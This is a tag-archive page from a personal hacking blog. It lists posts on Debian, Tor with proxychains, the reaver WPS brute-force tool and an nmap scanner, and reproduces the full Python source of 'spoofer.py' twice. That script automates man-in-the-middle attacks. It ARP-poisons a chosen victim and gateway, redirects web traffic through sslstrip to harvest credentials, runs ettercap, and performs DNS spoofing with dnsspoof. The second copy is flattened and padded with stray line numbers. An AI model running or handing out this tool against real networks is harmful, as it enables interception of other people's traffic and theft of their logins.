Tag Archives for linux

Debian backports

Debian is my personal favourite Linux distribution. I have used it for many years. I have tried other flavours but I always end up back where I started. I like to run the most stable releases on my machines, currently … Continue reading →

15. August 2012 by Matt
Categories: linux, Tutorial | Tags: backports, debian, kernel, linux, root | Leave a comment

Staying anonymous with tor & proxychains

I am going to give you a quick demo on getting tor installed along with proxychains to route network based applications through the tor network. This is aimed at debian based systems but the code can be used over any … Continue reading →

06. August 2012 by Matt
Categories: internet, linux, Tutorial | Tags: anon, anonymous, internet, linux, proxy, proxychains, tor | Leave a comment

Compiling reaver-wps

Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases. Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety … Continue reading →

31. July 2012 by Matt
Categories: Hacking, linux, Tutorial, Wireless | Tags: compile, hack, hacker, hacking, install, linux, reaver, reaver-wps, tutorial, wifi, wireless, wps | Leave a comment

[Python] Auto live host discovery and nmap scanner

Here’s a little tool I wrote that scans a range of IP addresses to find live hosts, then launches an nmap scan against each live IP. Tested and running in BackTrack and other Debian based distributions. Requires fping and nmap … Continue reading →

30. May 2012 by Matt
Categories: Hacking, internet, Programming, Python | Tags: fping, hacker, hacking, linux, metasploit, nmap, programming, python, scanner, unix | Leave a comment

Spoofer – Automated arp / dns poisoning

I have knocked up a little menu driven python tool called spoofer. Spoofer takes the leg work out of getting a system set up for man in the middle attacks. Here is the code:

#!/usr/bin/python
#
# Usage: ./spoofer.py {adapter} {slave-ip} {gateway-ip}
# eg: ./spoofer.py waln0 10.0.0.10 10.0.0.1
#
# Requirements:
# Dnsiff (arpspoof) - sslstrip - ettercap
#

from os import system, getuid
from sys import argv, exit
from time import sleep

class colours:
    bold = '\033[1m'
    red = '\033[31m'
    green = '\033[32m'
    reset = '\033[0;0m'

def arp_cleanup():
    # stop arpspoof    
    print "\n[+] Stopping arpspoof"
    system('killall arpspoof')            
    sleep(1)
    # set ip_forward to 0    
    print "[+] Stopping IPv4 forwarding"
    system('echo 0 > /proc/sys/net/ipv4/ip_forward')
    sleep(1)
    # clear iptables rules
    print "[+] Flushing iptable rules"
    system("iptables -t nat -D PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter)
    sleep(1)
    # stop ssl strip
    print "[+] Stopping sslstrip\n"
    system('kill $(ps -ef | grep sslstrip | awk \'{print $2}\')')
    sleep(1)
    exit()

def dns_cleanup():
    raw_input('\n[+] Hit ENTER to exit')
    # stop arpspoof    
    print "\n[+] Stopping dnsspoof"
    system('killall dnsspoof')            
    sleep(2)
    print "[+] Stopping arpspoof"
    system('killall arpspoof')            
    sleep(3)
    # stop dnsspoof    
    # set ip_forward to 0    
    print "[+] Stopping IPv4 forwarding\n"
    system('echo 0 > /proc/sys/net/ipv4/ip_forward')
    sleep(1)
    exit()

if getuid() != 0:
    print("You need to be root (sudo %s)" % argv[0])
else:
    if len(argv) < 2:
        system('clear')
        print("\nusage: %s adapter" % argv[0])
        print("\teg: %s eth0\n" % argv[0])
    else:
        # set some variables
        adapter = argv[1]

        spooftype = 0
        while spooftype != range(1,3):
            system('clear')
            spooftype = raw_input("\nSelect spoof type:\n\n[1] arp poison\n[2] dns spoof\n\nspoofer > ")
            # arp spoof attack
            if spooftype == "1":    
                slave = raw_input("\nEnter slave IP: > ")
                gateway = raw_input("Enter gateway IP: > ")

                # set rules for traffic forwarding            
                print "\n[+] Setting iptable rules"
                system("iptables -t nat -A PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter)
                sleep(2)

                # start arp poison on slave / gateway    
                print "[+] Starting arpspoof"
                system('arpspoof -i %s -t  %s  %s > /dev/null 2>&1 &' % (adapter, slave, gateway))
                sleep(2)

                # start sslstrip to harvest credentials
                print "[+] Starting sslstrip"
                system('python /pentest/web/sslstrip/sslstrip.py -a -f -k > /dev/null 2>&1 &')
                sleep(2)

                # run ettercap against slave
                print "[+] Starting ettercap"
                system('xterm -e ettercap -T -q -i %s &' % adapter)
                sleep(2)

                # set ip forward mode
                system('echo 1 > /proc/sys/net/ipv4/ip_forward')
                sleep(1)

                print colours.bold + colours.red + "\n[+] Before exiting quit ettercap gracefully. (hit Q in the ettercap window)" + colours.reset
                raw_input('\n[+] Hit ENTER to exit')

                # clean up            
                arp_cleanup()

            if spooftype == "2":
                slave = raw_input("\nEnter slave IP: > ")
                gateway = raw_input("Enter gateway IP: > ")

                # arp poison slave / gateway
                print colours.bold + colours.green + "\n[+] Poisoning..." + colours.reset
                system('arpspoof -i %s -t  %s  %s > /dev/null 2>&1 &' % (adapter, slave, gateway))
                sleep(2)

                # set ip forward mode
                system('echo 1 > /proc/sys/net/ipv4/ip_forward')
                sleep(1)

                # start dnsspoof
                system('dnsspoof -i %s -f /root/hosts.txt host %s and udp port 53 > /dev/null 2>&1 &' % (adapter, slave))

                #clear up
                dns_cleanup()

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

#!/usr/bin/python

# Usage: ./spoofer.py {adapter} {slave-ip} {gateway-ip}

# eg: ./spoofer.py waln0 10.0.0.10 10.0.0.1

# Requirements:

# Dnsiff (arpspoof) - sslstrip - ettercap

from os import system, getuid

from sys import argv, exit

from time import sleep

class colours:

bold = '\033[1m'

red = '\033[31m'

green = '\033[32m'

reset = '\033[0;0m'

def arp_cleanup():

# stop arpspoof

print "\n[+] Stopping arpspoof"

system('killall arpspoof')

sleep(1)

# set ip_forward to 0

print "[+] Stopping IPv4 forwarding"

system('echo 0 > /proc/sys/net/ipv4/ip_forward')

sleep(1)

# clear iptables rules

print "[+] Flushing iptable rules"

system("iptables -t nat -D PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter)

sleep(1)

# stop ssl strip

print "[+] Stopping sslstrip\n"

system('kill $(ps -ef | grep sslstrip | awk \'{print $2}\')')

sleep(1)

exit()

def dns_cleanup():

raw_input('\n[+] Hit ENTER to exit')

# stop arpspoof

print "\n[+] Stopping dnsspoof"

system('killall dnsspoof')

sleep(2)

print "[+] Stopping arpspoof"

system('killall arpspoof')

sleep(3)

# stop dnsspoof

# set ip_forward to 0

print "[+] Stopping IPv4 forwarding\n"

system('echo 0 > /proc/sys/net/ipv4/ip_forward')

sleep(1)

exit()

if getuid() != 0:

print("You need to be root (sudo %s)" % argv[0])

else:

if len(argv) < 2:

system('clear')

print("\nusage: %s adapter" % argv[0])

print("\teg: %s eth0\n" % argv[0])

else:

# set some variables

adapter = argv[1]

spooftype = 0

while spooftype != range(1,3):

system('clear')

spooftype = raw_input("\nSelect spoof type:\n\n[1] arp poison\n[2] dns spoof\n\nspoofer > ")

# arp spoof attack

if spooftype == "1":

slave = raw_input("\nEnter slave IP: > ")

gateway = raw_input("Enter gateway IP: > ")

# set rules for traffic forwarding

print "\n[+] Setting iptable rules"

system("iptables -t nat -A PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter)

sleep(2)

# start arp poison on slave / gateway

print "[+] Starting arpspoof"

system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway))

sleep(2)

# start sslstrip to harvest credentials

print "[+] Starting sslstrip"

system('python /pentest/web/sslstrip/sslstrip.py -a -f -k > /dev/null 2>&1 &')

sleep(2)

# run ettercap against slave

print "[+] Starting ettercap"

system('xterm -e ettercap -T -q -i %s &' % adapter)

sleep(2)

# set ip forward mode

system('echo 1 > /proc/sys/net/ipv4/ip_forward')

sleep(1)

print colours.bold + colours.red + "\n[+] Before exiting quit ettercap gracefully. (hit Q in the ettercap window)" + colours.reset

raw_input('\n[+] Hit ENTER to exit')

# clean up

arp_cleanup()

if spooftype == "2":

slave = raw_input("\nEnter slave IP: > ")

gateway = raw_input("Enter gateway IP: > ")

# arp poison slave / gateway

print colours.bold + colours.green + "\n[+] Poisoning..." + colours.reset

system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway))

sleep(2)

# set ip forward mode

system('echo 1 > /proc/sys/net/ipv4/ip_forward')

sleep(1)

# start dnsspoof

system('dnsspoof -i %s -f /root/hosts.txt host %s and udp port 53 > /dev/null 2>&1 &' % (adapter, slave))

#clear up

dns_cleanup()

Spoofer relies on you having … Continue reading →

27. March 2012 by Matt
Categories: Hacking, linux, Programming, Python, Uncategorized | Tags: arp cache, hacker, hacking, infosec, linux, poisoning, program, python, script, tools | 2 comments

← Older posts

Site admin

My tweets
- #GoogleIO keynote will be starting soon. Fingers crossed for some android goodness. 4 days ago
- @tuxserv Gtalk bot is operational. Can respond to system commands and is location aware. http://t.co/yMmh969prN 5 days ago
- Waiting for #Left4Dead2 to download on my linux box. Taking an age. Averaging 500 bytes/sec!! 2 weeks ago
- Sat having a pint at the Sun Inn, Pinxton. Pretty dead but I think I've found my local. 2 weeks ago
- #Android has truly won me over. 2 weeks ago
Tags
anonymous apple arp cache bash command line debian download hack hacker hacking idevice infosec internet iOS ios 5 ipad iphone jailbreak linux mac metasploit osx password poisoning program programming proxy proxychains python root sabnzb scanner script server shell sickbeard terminal tor twitter ubuntu unix usenet video web windows

Musings of a linux geek.

Search this site!

Follow me:

Tag Archives for linux

Debian backports

Staying anonymous with tor & proxychains

Compiling reaver-wps

[Python] Auto live host discovery and nmap scanner

Spoofer – Automated arp / dns poisoning

Site admin

My tweets